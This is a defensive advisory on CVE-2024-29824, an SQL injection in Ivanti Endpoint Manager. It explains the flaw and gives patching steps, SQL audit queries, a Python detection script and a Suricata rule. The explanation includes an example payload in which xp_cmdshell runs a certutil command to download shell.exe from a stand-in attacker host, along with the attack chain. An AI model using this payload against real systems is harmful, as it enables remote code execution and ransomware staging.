Background
Ivanti Endpoint Manager (EPM, formerly LANDESK Management Suite) is an enterprise endpoint management platform used by IT operations teams to deploy software, manage patches, and maintain inventory across large fleets of endpoints. EPM’s Core server has administrative authority over every managed endpoint in an organisation — the ability to push software, run scripts, and remotely control systems. This central management role makes it a high-value target: compromising EPM provides a ready-made mechanism for deploying malware to every managed device.
CVE-2024-29824 is a critical SQL injection vulnerability in Ivanti EPM’s DAS (Database Access Service) component. Disclosed in May 2024, it was added to CISA’s KEV catalogue in October 2024 after confirmed exploitation in the wild. Ivanti describes it as exploitable by an unauthenticated attacker on the same network as the Core server (internet-facing exposure is not required); the injection reaches the backing SQL Server instance, and command execution follows from there.
Technical Mechanism
CVE-2024-29824 is an SQL injection in Ivanti EPM’s Core server, specifically in the RecordGoodApp function within PatchBiz.dll — a component of the EPM DAS service that handles patch management operations.
The vulnerable function processes agent-submitted data that includes file hash and path information. This data is formatted straight into the SQL text instead of being passed as a bound parameter:
-- Vulnerable pattern (conceptual; not the literal query text in PatchBiz.dll)
-- When an agent submits patch inventory data, the Core builds a statement of this shape:
INSERT INTO GoodApps (hash, path) VALUES ('<agent_hash>', '<agent_path>')
-- Malicious agent-supplied hash value. It closes the VALUES list so the batch still parses
-- (SQL Server compiles a whole batch before running any of it), then stacks a second statement:
hash = abc123', 'x'); EXEC xp_cmdshell 'certutil -urlcache -f http://attacker.com/shell.exe C:\temp\shell.exe'; --
-- Resulting batch (the original closing quote and path are swallowed by the -- comment):
INSERT INTO GoodApps (hash, path) VALUES ('abc123', 'x'); EXEC xp_cmdshell 'certutil -urlcache -f http://attacker.com/shell.exe C:\temp\shell.exe'; --', '<agent_path>')
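To make the mechanism concrete, the following is an added Python model (not Ivanti's code and not a proof of concept) of the formatting pattern beside its parameterised fix. SQLite stands in for SQL Server and executescript() mimics batch execution, where stacked statements run; because SQLite has no xp_cmdshell, the stacked statement creates a marker table so the effect is observable. The GoodApps table and the injected hash value are constructed for the example.

```python
import sqlite3

# Constructed agent-supplied "hash". It closes the open VALUES list so the batch parses, then
# stacks a second statement. On SQL Server that statement would be EXEC xp_cmdshell; here it
# creates a marker table instead.
INJECTED_HASH = "abc123', 'x'); CREATE TABLE pwned (note TEXT); --"


def fresh_db():
    """In-memory stand-in for the EPM database with the conceptual GoodApps table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE GoodApps (hash TEXT, path TEXT)")
    return conn


def record_good_app_vulnerable(conn, file_hash, path):
    """Models the vulnerable pattern: untrusted fields formatted into the SQL text.
    executescript() runs every statement in the string, as a SQL Server batch would."""
    sql = "INSERT INTO GoodApps (hash, path) VALUES ('%s', '%s')" % (file_hash, path)
    conn.executescript(sql)
    return sql


def record_good_app_fixed(conn, file_hash, path):
    """Hardened form: bound parameters, so the input is only ever data, never SQL."""
    conn.execute("INSERT INTO GoodApps (hash, path) VALUES (?, ?)", (file_hash, path))
    conn.commit()


def table_exists(conn, name):
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)
    ).fetchone()
    return row is not None


def stored_hashes(conn):
    return [r[0] for r in conn.execute("SELECT hash FROM GoodApps ORDER BY rowid")]


def demo():
    """Feed the same input to both paths.
    Returns (marker table created by vulnerable path, marker table created by fixed path)."""
    path = r"C:\Program Files\App\app.exe"
    vuln = fresh_db()
    record_good_app_vulnerable(vuln, INJECTED_HASH, path)
    fixed = fresh_db()
    record_good_app_fixed(fixed, INJECTED_HASH, path)
    return table_exists(vuln, "pwned"), table_exists(fixed, "pwned")


if __name__ == "__main__":
    print(demo())
```

In the vulnerable path the row that lands in GoodApps has hash 'abc123' and the attacker's second statement runs; in the fixed path the whole payload is stored verbatim as the hash and nothing else executes. The same contrast holds for any driver that binds parameters, which is the fix category for this CVE class.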
The attack chain:
- Reach the EPM DAS service: The DAS service listens on a network port within the organisation’s network. Attackers on the internal network, or with access via VPN, can reach it.
- Submit malicious inventory data: Craft a request simulating an EPM agent submitting patch data, with a SQL injection payload in the hash or path field.
- Enable xp_cmdshell: If not already enabled, use sp_configure to enable the SQL Server extended stored procedure. This requires the ALTER SETTINGS server permission (held by sysadmin), so the step only works when the login EPM uses to reach SQL Server is that privileged.
- Execute commands: Use xp_cmdshell to run arbitrary Windows commands in the context of the SQL Server service account (typically LOCAL SYSTEM or a high-privilege service account).
Horizon3.ai and other researchers published technical analyses confirming that the vulnerable code is the RecordGoodApp function and that the SQL Server login EPM uses typically carries enough privilege to enable and execute xp_cmdshell.
Real-World Exploitation Evidence
CISA added CVE-2024-29824 to its KEV catalogue on October 2, 2024, confirming active exploitation. The exploitation context:
- Internal network exploitation: While the vulnerability requires internal network access (not directly exploitable from the internet for most deployments), it is highly valuable for post-breach lateral movement — an attacker who has breached any system on the corporate network can pivot to EPM and gain domain-wide endpoint management access.
- Ransomware staging: EPM’s ability to push software to all managed endpoints makes it a perfect ransomware deployment mechanism; threat actors use EPM compromises to achieve simultaneous mass deployment.
- Chained with other vulnerabilities: Attackers who gained an initial foothold through phishing, VPN exploitation, or other means used CVE-2024-29824 as a privilege escalation and lateral movement step.
Impact Assessment
EPM server compromise is among the highest-impact lateral movement scenarios:
- Domain-wide endpoint control: EPM has administrative authority to push software and scripts to every managed endpoint; this becomes a ransomware deployment weapon.
- Endpoint security bypass: EPM can modify endpoint configurations including security software settings, whitelisting rules, and update policies.
- Mass credential harvesting: Scripts pushed via EPM can harvest credentials from every managed endpoint simultaneously.
- Software distribution hijacking: EPM’s software distribution features can push trojanised software as if it were a legitimate IT deployment.
- Hardware inventory: EPM’s asset inventory contains detailed information on every managed device, useful for attacker reconnaissance.
Affected Versions
| Product | Affected Versions | Fixed Version |
|---|---|---|
| Ivanti EPM 2024 | 2024 (before hotfix) | 2024 SU1 |
| Ivanti EPM 2022 | 2022 SU5 and earlier | 2022 SU6 |
Remediation Steps
- Apply Ivanti patches: Update to EPM 2024 SU1 or EPM 2022 SU6 from the Ivanti Customer Success portal.
- Restrict EPM DAS network access: Ensure the EPM Core server’s DAS service ports are only accessible from authorised EPM agents and management workstations, not from general internal network segments.
- Audit SQL Server configuration:
-- Check whether xp_cmdshell is enabled (value_in_use is the running setting)
SELECT name, value, value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell';
-- Disable xp_cmdshell if not required ('show advanced options' must be on before it can be changed)
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
-- Look for cached batches that called xp_cmdshell. This only covers the plan cache, which is
-- cleared on restart or under memory pressure, and the query lists itself because it contains the string.
SELECT qs.last_execution_time, qs.execution_count, st.text
FROM sys.dm_exec_query_stats AS qs
CROSS APPLY sys.dm_exec_sql_text(qs.sql_handle) AS st
WHERE st.text LIKE '%xp_cmdshell%'
ORDER BY qs.last_execution_time DESC;
- Review EPM agent accounts: Audit which agent accounts are registered and whether any rogue agents have been added.
- Check for unusual software distributions: Review EPM’s software distribution history for any unexpected deployments that might indicate attacker activity.
- Monitor SQL Server for xp_cmdshell usage: Enable SQL Server Audit or Extended Events to log xp_cmdshell calls.
Detection Guidance
Log sources:
- Windows Event Logs on EPM Core server (Event ID 4688 for process creation)
- SQL Server error log and audit log
- Ivanti EPM application logs: C:\ProgramData\LANDesk\ManagementSuite\logs\
SQL Server audit for xp_cmdshell (the server audit must exist first, and because xp_cmdshell lives in master the object-level action belongs in a database audit specification created there; the file path is a placeholder):
-- Create the audit target, then audit EXECUTE on xp_cmdshell in master
CREATE SERVER AUDIT EPM_audit TO FILE (FILEPATH = 'C:\SQLAudit\');
ALTER SERVER AUDIT EPM_audit WITH (STATE = ON);
USE master;
CREATE DATABASE AUDIT SPECIFICATION EPM_xpcmdshell_audit
FOR SERVER AUDIT EPM_audit
ADD (EXECUTE ON OBJECT::[sys].[xp_cmdshell] BY [public]) WITH (STATE = ON);
Windows Event Log patterns:
- Event 4688: sqlservr.exe spawning cmd.exe or powershell.exe
- Event 7045: New service installation on the EPM server
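The 4688 pattern above, as an added triage script (not from the original page or any vendor tooling) run over constructed sample records shaped like Windows Security 4688 fields. It flags process creations whose parent is sqlservr.exe and whose child is a shell or download utility, and separately flags a certutil -urlcache download cradle in the command line. ParentProcessName is only logged on Windows 10 / Server 2016 and later, and CommandLine only when the "Include command line in process creation events" policy is on; without those fields the parent check cannot fire. The events, user names and paths are constructed for the example.

```python
import ntpath

# Child images that SQL Server has no legitimate reason to spawn on an EPM Core server.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe",
                       "bitsadmin.exe", "mshta.exe"}

# Constructed sample records in the shape of Windows Security 4688 fields (not real telemetry).
# A process started by a LOCAL SYSTEM service logs the computer account (here EPMCORE$) as subject.
SAMPLE_EVENTS = [
    {"EventID": 4688, "SubjectUserName": "EPMCORE$",
     "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     "CommandLine": r"cmd.exe /c certutil -urlcache -f http://attacker.example/shell.exe C:\temp\shell.exe"},
    {"EventID": 4688, "SubjectUserName": "EPMCORE$",
     "NewProcessName": r"C:\Windows\System32\conhost.exe",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"\??\C:\Windows\system32\conhost.exe 0x4"},
    {"EventID": 4688, "SubjectUserName": "jsmith",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -NoProfile"},
    {"EventID": 4688, "SubjectUserName": "EPMCORE$",
     "NewProcessName": r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\SQLDumper.exe",
     "ParentProcessName": r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     "CommandLine": r"SQLDumper.exe"},
    {"EventID": 4624, "SubjectUserName": "EPMCORE$"},  # a logon event, not process creation
]


def _image(path):
    """Lower-cased file name from a Windows path ('' when the field is absent)."""
    return ntpath.basename(path or "").lower()


def classify_event(event):
    """Return the reasons a 4688 record is suspicious; an empty list means no finding."""
    if event.get("EventID") != 4688:
        return []
    child = _image(event.get("NewProcessName"))
    parent = _image(event.get("ParentProcessName"))
    cmdline = (event.get("CommandLine") or "").lower()
    reasons = []
    if parent == "sqlservr.exe" and child in SUSPICIOUS_CHILDREN:
        reasons.append("sqlservr.exe spawned %s (xp_cmdshell pattern)" % child)
    if "certutil" in cmdline and "-urlcache" in cmdline:
        reasons.append("certutil download cradle in command line")
    return reasons


def triage(events):
    """Run classify_event over a batch; return the hits with index, subject and image."""
    findings = []
    for idx, ev in enumerate(events):
        reasons = classify_event(ev)
        if reasons:
            findings.append({"index": idx, "user": ev.get("SubjectUserName"),
                             "process": ev.get("NewProcessName"), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Only the first record fires, on both rules; SQLDumper.exe under sqlservr.exe is a normal crash-dump child and stays quiet, as does an interactive PowerShell under explorer.exe. In production the parent check is the higher-fidelity signal, since the command-line rule depends on the attacker's choice of download tool.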
Suricata signature (content matching only works on cleartext; if the Core’s web services are served over TLS this rule must run on a decrypting sensor or the detection must move to the host):
alert tcp $HOME_NET any -> $HOME_NET 9593 (msg:"Ivanti EPM CVE-2024-29824 DAS SQL Injection Probe"; flow:established,to_server; content:"RecordGoodApp"; nocase; content:"xp_cmdshell"; nocase; distance:0; sid:9002982; rev:1;)
Timeline
| Date | Event |
|---|---|
| May 21, 2024 | Ivanti publishes advisory; patches released |
| June 2024 | Security researchers (Horizon3.ai) publish technical analysis and PoC |
| October 2, 2024 | CISA adds CVE-2024-29824 to KEV catalogue (confirmed exploitation) |
| September 2024 | Multiple threat actors documented exploiting vulnerability |
| October 2024 | Ransomware campaigns using EPM as deployment mechanism documented |